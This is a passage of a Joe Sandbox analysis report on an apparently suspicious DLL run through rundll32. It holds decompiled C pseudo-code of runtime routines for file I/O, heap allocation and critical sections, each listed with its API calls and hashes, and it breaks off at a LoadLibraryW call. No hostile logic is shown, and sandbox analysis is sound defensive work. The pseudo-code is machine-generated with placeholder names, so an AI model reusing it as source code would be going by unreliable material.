                                                                                                            				intOrPtr _t45;
                                                                                                            
                                                                                                            				_push(_t27);
                                                                                                            				_t45 =  *0x10050cac; // 0x1
                                                                                                            				if(_t45 == 0) {
                                                                                                            					E10012D82();
                                                                                                            				}
                                                                                                            				 *0x1004f6fc = 0;
                                                                                                            				GetModuleFileNameA(0, 0x1004f5f8, 0x104);
                                                                                                            				_t10 =  *0x10050cb0; // 0x30e3538
                                                                                                            				 *0x1004f410 = 0x1004f5f8;
                                                                                                            				if(_t10 == 0) {
                                                                                                            					L4:
                                                                                                            					_t25 = 0x1004f5f8;
                                                                                                            				} else {
                                                                                                            					_t25 = _t10;
                                                                                                            					if( *_t10 == 0) {
                                                                                                            						goto L4;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				E1001645D(_t25, 0,  &_v12, 0,  &_v8);
                                                                                                            				_t40 = _v8 << 2;
                                                                                                            				_t16 = E100107B6(_v12 + (_v8 << 2));
                                                                                                            				_t34 = _t16;
                                                                                                            				if(_t34 != 0) {
                                                                                                            					E1001645D(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
                                                                                                            					 *0x1004f3f4 = _v8 - 1;
                                                                                                            					 *0x1004f3f8 = _t34;
                                                                                                            					_t22 = 0;
                                                                                                            				} else {
                                                                                                            					_t22 = _t16 | 0xffffffff;
                                                                                                            				}
                                                                                                            				return _t22;
                                                                                                            			}














                                                                                                            APIs
                                                                                                            • ___initmbctable.LIBCMT ref: 100165DB
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104,00000000,?,?,?,?,?,1001125B,?,?,?,10011379,?,?), ref: 100165F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName___initmbctable
                                                                                                            • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                            • API String ID: 767393020-2837366778
                                                                                                            • Opcode ID: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                                                            • Instruction ID: 1de5955471f92093fdaebd9574c573a93ec7bfc48d4baa4f39bbab7b9738bcfe
                                                                                                            • Opcode Fuzzy Hash: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                                                            • Instruction Fuzzy Hash: 3F110AB6A04224AFD700CF99DC8599F7BE8EB4A360F21016DF915D7240EA70EE80CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E1001B190(void* __ecx, void* __eflags, signed int _a4, long _a8, long _a12, long _a16) {
                                                                                                            				long _v8;
                                                                                                            				long _v12;
                                                                                                            				void* _t21;
                                                                                                            				long _t22;
                                                                                                            				long _t27;
                                                                                                            				signed int _t38;
                                                                                                            				signed int _t39;
                                                                                                            				signed int _t42;
                                                                                                            
                                                                                                            				_t42 = _a4;
                                                                                                            				_v12 = _a8;
                                                                                                            				_push(_t38);
                                                                                                            				_v8 = _a12;
                                                                                                            				_t21 = E1001B08D(_t42);
                                                                                                            				_t39 = _t38 | 0xffffffff;
                                                                                                            				if(_t21 != _t39) {
                                                                                                            					_t22 = SetFilePointer(_t21, _v12,  &_v8, _a16);
                                                                                                            					_v12 = _t22;
                                                                                                            					if(_t22 != _t39 || GetLastError() == 0) {
                                                                                                            						_t15 = ((_t42 & 0x0000001f) + (_t42 & 0x0000001f) * 8) * 4; // 0x0
                                                                                                            						 *( *((intOrPtr*)(0x1004f920 + (_t42 >> 5) * 4)) + _t15 + 4) =  *( *((intOrPtr*)(0x1004f920 + (_t42 >> 5) * 4)) + _t15 + 4) & 0x000000fd;
                                                                                                            						_t27 = _v12;
                                                                                                            					} else {
                                                                                                            						E10013707(_t28);
                                                                                                            						goto L5;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					 *((intOrPtr*)(E100136F5())) = 9;
                                                                                                            					L5:
                                                                                                            					_t27 = _t39;
                                                                                                            				}
                                                                                                            				return _t27;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(00000000,1004C878,00000001,00000000,00000000,00000000,1004C878,1004C878,?,10019815,?,00000000,00000000,00000002,00000000,1004C878), ref: 1001B1CC
                                                                                                            • GetLastError.KERNEL32 ref: 1001B1D9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 2976181284-4125583295
                                                                                                            • Opcode ID: 9ba7a4b55cc6b9151db88e243d1aee17f864ad0bfb3139241dfe53ebd75a8a52
                                                                                                            • Instruction ID: 53af0a452f36b2f0e5d3ec892390ecf8c1e17cdf248c2bebef8a867a22bb85e5
                                                                                                            • Opcode Fuzzy Hash: 9ba7a4b55cc6b9151db88e243d1aee17f864ad0bfb3139241dfe53ebd75a8a52
                                                                                                            • Instruction Fuzzy Hash: FD018476A10659FFCB01DF99CC94C9E7BB9EF45360B154259F410DB191EB70EE808760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001968C(void* __eflags, signed int _a4, long _a8, long _a12) {
                                                                                                            				void* _t11;
                                                                                                            				long _t13;
                                                                                                            				signed int _t17;
                                                                                                            				signed int _t19;
                                                                                                            				signed int _t27;
                                                                                                            				signed int _t29;
                                                                                                            
                                                                                                            				_t29 = _a4;
                                                                                                            				_t11 = E1001B08D(_t29);
                                                                                                            				if(_t11 != 0xffffffff) {
                                                                                                            					_t27 = SetFilePointer(_t11, _a8, 0, _a12);
                                                                                                            					if(_t27 != 0xffffffff) {
                                                                                                            						_t13 = 0;
                                                                                                            					} else {
                                                                                                            						_t13 = GetLastError();
                                                                                                            					}
                                                                                                            					if(_t13 == 0) {
                                                                                                            						_t9 = ((_t29 & 0x0000001f) + (_t29 & 0x0000001f) * 8) * 4; // 0x1004c87c
                                                                                                            						 *( *((intOrPtr*)(0x1004f920 + (_t29 >> 5) * 4)) + _t9 + 4) =  *( *((intOrPtr*)(0x1004f920 + (_t29 >> 5) * 4)) + _t9 + 4) & 0x000000fd;
                                                                                                            						_t17 = _t27;
                                                                                                            					} else {
                                                                                                            						_t17 = E10013707(_t13) | 0xffffffff;
                                                                                                            					}
                                                                                                            					return _t17;
                                                                                                            				} else {
                                                                                                            					_t19 = E100136F5();
                                                                                                            					 *_t19 = 9;
                                                                                                            					return _t19 | 0xffffffff;
                                                                                                            				}
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(00000000,?,00000000,?,?,00000000,10019757,1004C878,00000000,10015998,10042D38,0000000C,1001566D,?,00000000,00000002), ref: 100196B9
                                                                                                            • GetLastError.KERNEL32 ref: 100196C6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 2976181284-4125583295
                                                                                                            • Opcode ID: 68e3d03425bb9cabc03b1a0108c4a9615d7641a77f49b79bc778628c12f12515
                                                                                                            • Instruction ID: a629910bf8626f7fffa0a6a4af3c3ed297814fe42fece7765db2dd3634906eea
                                                                                                            • Opcode Fuzzy Hash: 68e3d03425bb9cabc03b1a0108c4a9615d7641a77f49b79bc778628c12f12515
                                                                                                            • Instruction Fuzzy Hash: 2201A4362096616BCA11DF7CAC5594A3B94DB86370F220749F570CF1E1DB30EC818771
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10025478(void* __ecx, void* _a4, long _a8) {
                                                                                                            				void* __ebp;
                                                                                                            				int _t8;
                                                                                                            				long _t13;
                                                                                                            				void* _t14;
                                                                                                            				void* _t15;
                                                                                                            
                                                                                                            				_t12 = __ecx;
                                                                                                            				_t13 = _a8;
                                                                                                            				_t14 = __ecx;
                                                                                                            				if(_t13 != 0) {
                                                                                                            					_t8 = WriteFile( *(__ecx + 4), _a4, _t13,  &_a8, 0);
                                                                                                            					if(_t8 == 0) {
                                                                                                            						_t8 = E100271C6(_t15, GetLastError(),  *((intOrPtr*)(_t14 + 0xc)));
                                                                                                            					}
                                                                                                            					if(_a8 != _t13) {
                                                                                                            						_push( *((intOrPtr*)(_t14 + 0xc)));
                                                                                                            						_push(0xffffffff);
                                                                                                            						_push(0xd);
                                                                                                            						return E10027180(_t12);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t8;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10025493
                                                                                                            • GetLastError.KERNEL32(?), ref: 100254A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 442123175-4125583295
                                                                                                            • Opcode ID: ab0e3457abfdb6784960fbcafb9409f2e606667c52f2adbf15f487c772deef89
                                                                                                            • Instruction ID: 1efd054c324430f6bdfd1b59f081dc2d54efa2d2671d6c80a9c9a9e690e28720
                                                                                                            • Opcode Fuzzy Hash: ab0e3457abfdb6784960fbcafb9409f2e606667c52f2adbf15f487c772deef89
                                                                                                            • Instruction Fuzzy Hash: 74F0A7362006187FDB11AF96EC04F87BBACEF40772F40C11AF92985060D731D5508B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10025438(void* __ecx, void* _a4, long _a8) {
                                                                                                            				void* __ebp;
                                                                                                            				void* _t15;
                                                                                                            				void* _t16;
                                                                                                            
                                                                                                            				_t15 = __ecx;
                                                                                                            				if(_a8 != 0) {
                                                                                                            					if(ReadFile( *(__ecx + 4), _a4, _a8,  &_a8, 0) == 0) {
                                                                                                            						E100271C6(_t16, GetLastError(),  *((intOrPtr*)(_t15 + 0xc)));
                                                                                                            					}
                                                                                                            					return _a8;
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,00000000,00000000,00000000), ref: 10025457
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 10025464
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastRead
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1948546556-4125583295
                                                                                                            • Opcode ID: 8e1365c80fcfabd30bbf1da311fd5a14f49e0aa91301eb25eec651b4f5fe3069
                                                                                                            • Instruction ID: 9f7230fa58b18192531b9e87cef107ece2d112799f9fd2653fc72eebc1d7825c
                                                                                                            • Opcode Fuzzy Hash: 8e1365c80fcfabd30bbf1da311fd5a14f49e0aa91301eb25eec651b4f5fe3069
                                                                                                            • Instruction Fuzzy Hash: EDE09232100218BFDB01AFA0EC04FCAB7ACEF08266F80C426FD19C9020D731EA509B54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10024C8E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, char* _a16, intOrPtr _a20) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v268;
                                                                                                            				intOrPtr _v272;
                                                                                                            				intOrPtr _v276;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t39;
                                                                                                            				int _t40;
                                                                                                            				void* _t50;
                                                                                                            				char* _t51;
                                                                                                            				intOrPtr _t52;
                                                                                                            				char* _t61;
                                                                                                            				signed int _t62;
                                                                                                            				CHAR* _t64;
                                                                                                            				signed int _t73;
                                                                                                            				void* _t74;
                                                                                                            				CHAR* _t82;
                                                                                                            				intOrPtr _t85;
                                                                                                            				intOrPtr _t87;
                                                                                                            
                                                                                                            				_t39 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_v8 = _t39;
                                                                                                            				_v272 = __ecx;
                                                                                                            				if(_a12 == 0) {
                                                                                                            					L10:
                                                                                                            					_t40 = 0;
                                                                                                            					__eflags = 0;
                                                                                                            					L11:
                                                                                                            					return E100117AE(_t40, _v8);
                                                                                                            				}
                                                                                                            				_t73 = _a8 << 2;
                                                                                                            				_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t73)) - 0xc));
                                                                                                            				if(_t85 == 0) {
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            				_t77 = _a4;
                                                                                                            				_t82 = E100017D0(_a4, _t85 + 1);
                                                                                                            				if(_t82 == 0) {
                                                                                                            					E1001CE3B(_t77);
                                                                                                            				}
                                                                                                            				_t74 = lstrcpynA;
                                                                                                            				lstrcpynA(_t82,  *( *((intOrPtr*)(_v272 + 8)) + _t73), _t85 + 1);
                                                                                                            				_t50 = E10038481(_t82, 0, 0);
                                                                                                            				_t51 = _a16;
                                                                                                            				_t87 = _t85 - _t50 + 1;
                                                                                                            				_v276 = _t87;
                                                                                                            				if(_t87 != _t51) {
                                                                                                            					L7:
                                                                                                            					_t52 = _v272;
                                                                                                            					__eflags =  *((intOrPtr*)(_t52 + 0x18)) - 0xffffffff;
                                                                                                            					if( *((intOrPtr*)(_t52 + 0x18)) != 0xffffffff) {
                                                                                                            						_a12 = _t87 + _t82;
                                                                                                            						E1002565C(_t82, 0x104, _t87 + _t82,  &_v268, 0x104);
                                                                                                            						__eflags = 0x104;
                                                                                                            						lstrcpynA(_a12,  &_v268, 0x104 - _v276);
                                                                                                            						E10024AA1(__eflags, _t82,  *((intOrPtr*)(_v272 + 0x18)), _a20);
                                                                                                            					}
                                                                                                            					goto L9;
                                                                                                            				} else {
                                                                                                            					_t61 = _t51 + _t82;
                                                                                                            					_a11 =  *((intOrPtr*)(_t87 + _t82));
                                                                                                            					_a16 = _t61;
                                                                                                            					 *_t61 = 0;
                                                                                                            					_t62 = lstrcmpiA(_a12, _t82);
                                                                                                            					asm("sbb eax, eax");
                                                                                                            					_t64 =  ~_t62 + 1;
                                                                                                            					_a12 = _t64;
                                                                                                            					 *((char*)(_t87 + _t82)) = _a11;
                                                                                                            					if(_t64 == 0) {
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            					E1002565C(_t82, 0x104, _a16,  &_v268, 0x104);
                                                                                                            					lstrcpynA(_t82,  &_v268, 0x104);
                                                                                                            					L9:
                                                                                                            					E10006CE2(_t74, _a4, _t82, 0xffffffff);
                                                                                                            					_t40 = 1;
                                                                                                            					goto L11;
                                                                                                            				}
                                                                                                            			}






















                                                                                                            APIs
                                                                                                            • lstrcpynA.KERNEL32(00000000,?,?,?), ref: 10024CF7
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10024D25
                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000104), ref: 10024D59
                                                                                                              • Part of subcall function 1002565C: GetFileTitleA.COMDLG32(?,?,00000000,00000000,00000104), ref: 1002568C
                                                                                                            • lstrcpynA.KERNEL32(00000000,?,?,?,?,00000104,00000000,00000000,00000000), ref: 10024D93
                                                                                                              • Part of subcall function 10024AA1: lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                                                              • Part of subcall function 10024AA1: lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpyn$FileTitlelstrcmpilstrcpylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1551867014-0
                                                                                                            • Opcode ID: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                                                            • Instruction ID: f695b848086fad3498a552c61b02124914b138edf6a9cb0088e4b153e3f01fcd
                                                                                                            • Opcode Fuzzy Hash: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                                                            • Instruction Fuzzy Hash: 39418B76900269AFCB51CF68DC80EEA77F9EF49344F010199F99997251DB70EE81CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10013EDE() {
                                                                                                            				signed int _t15;
                                                                                                            				void* _t17;
                                                                                                            				void* _t18;
                                                                                                            				intOrPtr* _t20;
                                                                                                            				void* _t24;
                                                                                                            				signed int _t26;
                                                                                                            				void* _t27;
                                                                                                            				intOrPtr* _t30;
                                                                                                            
                                                                                                            				_t15 =  *0x10050a48; // 0x0
                                                                                                            				_t26 =  *0x10050a58; // 0x0
                                                                                                            				if(_t15 != _t26) {
                                                                                                            					L4:
                                                                                                            					_t27 =  *0x10050a4c; // 0x0
                                                                                                            					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
                                                                                                            					_t17 = HeapAlloc( *0x10050a60, 8, 0x41c4);
                                                                                                            					 *(_t30 + 0x10) = _t17;
                                                                                                            					if(_t17 != 0) {
                                                                                                            						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
                                                                                                            						 *(_t30 + 0xc) = _t18;
                                                                                                            						if(_t18 != 0) {
                                                                                                            							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
                                                                                                            							 *_t30 = 0;
                                                                                                            							 *((intOrPtr*)(_t30 + 4)) = 0;
                                                                                                            							 *0x10050a48 =  *0x10050a48 + 1;
                                                                                                            							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
                                                                                                            							_t20 = _t30;
                                                                                                            						} else {
                                                                                                            							HeapFree( *0x10050a60, 0,  *(_t30 + 0x10));
                                                                                                            							goto L5;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						L5:
                                                                                                            						_t20 = 0;
                                                                                                            					}
                                                                                                            					return _t20;
                                                                                                            				} else {
                                                                                                            					_t2 = _t26 * 4; // 0x50
                                                                                                            					_t24 = HeapReAlloc( *0x10050a60, 0,  *0x10050a4c, _t26 + _t2 + 0x50 << 2);
                                                                                                            					if(_t24 != 0) {
                                                                                                            						 *0x10050a58 =  *0x10050a58 + 0x10;
                                                                                                            						 *0x10050a4c = _t24;
                                                                                                            						_t15 =  *0x10050a48; // 0x0
                                                                                                            						goto L4;
                                                                                                            					} else {
                                                                                                            						return 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,00000000,100144CF,00000000,?,00000000), ref: 10013F05
                                                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,100144CF,00000000,?,00000000), ref: 10013F3E
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10013F5C
                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 10013F73
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap$FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3499195154-0
                                                                                                            • Opcode ID: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                                                            • Instruction ID: aeb6b17fbef21620812925e1521d5c5e2c0640cb2d2eb2dc13b54a0eeae557ec
                                                                                                            • Opcode Fuzzy Hash: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                                                            • Instruction Fuzzy Hash: D0116D346003659FE761CF19DCC5D1A7BB1FB81760710852DF156DA5B1C3719882DB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10037A1B(signed int _a4) {
                                                                                                            				struct _CRITICAL_SECTION* _t13;
                                                                                                            				signed int _t21;
                                                                                                            				intOrPtr* _t24;
                                                                                                            
                                                                                                            				if( *0x1004f350 == 0) {
                                                                                                            					E100379F7();
                                                                                                            				}
                                                                                                            				_t21 = _a4;
                                                                                                            				_t24 = 0x1004f158 + _t21 * 4;
                                                                                                            				if( *_t24 == 0) {
                                                                                                            					EnterCriticalSection(0x1004f19c);
                                                                                                            					if( *_t24 == 0) {
                                                                                                            						InitializeCriticalSection(0x1004f1b8 + (_t21 + _t21 * 2) * 8);
                                                                                                            						 *_t24 =  *_t24 + 1;
                                                                                                            					}
                                                                                                            					LeaveCriticalSection(0x1004f19c);
                                                                                                            				}
                                                                                                            				_t13 = 0x1004f1b8 + (_t21 + _t21 * 2) * 8;
                                                                                                            				EnterCriticalSection(_t13);
                                                                                                            				return _t13;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A49
                                                                                                            • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A5B
                                                                                                            • LeaveCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A64
                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A76
                                                                                                              • Part of subcall function 100379F7: InitializeCriticalSection.KERNEL32(1004F19C,10037A29,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                            • String ID:
                                                                                                            • API String ID: 713024617-0
                                                                                                            • Opcode ID: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                                                            • Instruction ID: b71c326a3937b492ac304e5451021ab9c1c46bd2d9d00a0dd2066787caa8deb7
                                                                                                            • Opcode Fuzzy Hash: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                                                            • Instruction Fuzzy Hash: EFF0493200026EEFD711EF95CC88A66B3ACFB85322F40082AE148C2022D734B556CAA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:9%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:279
                                                                                                            Total number of Limit Nodes:10

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 252 e3f6a1-e3f745 call e332c4 call e252f2 LoadLibraryW
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E00E3F6A1(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                            				unsigned int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				void* _t31;
                                                                                                            				struct HINSTANCE__* _t37;
                                                                                                            				WCHAR* _t40;
                                                                                                            
                                                                                                            				_push(_a12);
                                                                                                            				_t40 = __edx;
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				_push(__ecx);
                                                                                                            				E00E332C4(_t31);
